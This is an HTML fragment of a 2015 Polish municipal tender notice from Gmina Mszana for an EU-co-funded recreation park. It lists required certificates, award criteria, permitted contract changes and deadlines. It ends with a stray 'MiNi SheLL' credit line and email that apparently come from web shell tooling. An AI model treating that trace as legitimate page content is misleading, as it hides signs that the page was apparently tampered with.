<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wraz z ofertą składa również następujące dokumenty i załączniki:
1. wypełnioną i podpisaną przez osoby upoważnione do reprezentowania Wykonawcy Ofertę wraz z załącznikami - z wykorzystaniem wzoru stanowiącego załącznik nr 1 do Formularza ofertowego,
2. pełnomocnictwo - do reprezentowania wykonawców w postępowaniu albo do reprezentowania wykonawców w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca wykonawców w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej; 
3. dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz ze wskazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy;
4. kosztorys ofertowy sporządzony na podstawie załączonego do SIWZ Przedmiaru robót. Wykonawca zobowiązany jest uwzględnić wszystkie pozycje robót opisane w przedmiarze robót. Pozycje, przy których nie zostaną podane ceny za ich wykonanie (niewypełnione pozycje przedmiaru robót przez Wykonawcę), nie będą dodatkowo opłacone po wykonaniu prac, gdyż Zamawiający przyjmuje, że ich koszt został pokryty przez inne ceny podane w przedmiarze robót;
5. wzór dokumentu gwarancyjnego stanowiącego załącznik nr 14 do Formularza ofertowego;
6. potwierdzenie wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja na wykonane roboty budowlane i instalacyjne - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
a. zmianę terminu wykonania zamówienia dopuszcza się w sytuacji nieprzewidzianej i niezawinionej przez strony, której wystąpienia nie mogły przewidzieć pomimo zachowania należytej staranności;
b. w przypadku wystąpienia robót dodatkowych warunkujących prawidłowe wykonanie przedmiotu umowy, termin realizacji zamówienia wskazany w § 3 może ulec wydłużeniu o czas niezbędny do zakończenia zamówień dodatkowych;
c. w przypadku wystąpienia awarii mającej bezpośredni wpływ na realizację przedmiotu zamówienia,  termin realizacji zamówienia wskazany w § 3 może ulec wydłużeniu o czas niezbędny do usunięcia jej skutków; 
d. zmianę terminu wykonania zamówienia dopuszcza się w przypadku wstrzymania robót z przyczyn leżących po stronie Zamawiającego, o okres wstrzymania robót;
e. powierzenia podwykonawcy do wykonania dodatkowej, ponad określoną w § 5 ust 2,  części przedmiotu zamówienia;
f. powierzenia do wykonania jakiejkolwiek części zamówienia nowemu podwykonawcy;
g. zmiany podwykonawcy;
h. zmian regulacji prawnych obowiązujących w dniu podpisania umowy (m.in. zmiana stawki podatku VAT);
i. gdy z przyczyn organizacyjnych, konieczna będzie zmiana osób uprawnionych do dokonywania czynności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mszana.finn.pl/index.jsp?bipkod=/013<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Mszanie
ul. 1 Maja 81
44-325 Mszana.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2015 godzina 10:00, miejsce: Urząd Gminy w Mszanie
ul. 1 Maja 81
44-325 Mszana,
sekretariat Urzędu, pok. nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizowane zadanie pn. Park Aktywnej Rekreacji w Mszanie szansą na rozwój turystyki w regionie - jest współfinansowane z Regionalnego Programu Operacyjnego WSL na lata 2007 - 2013, w ramach Priorytetu III Turystyka, Działania 3.2 Infrastruktura okołoturystyczna, Poddziałanie 3.2.2 Infrastruktura okołoturystyczna / podmioty publiczne..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com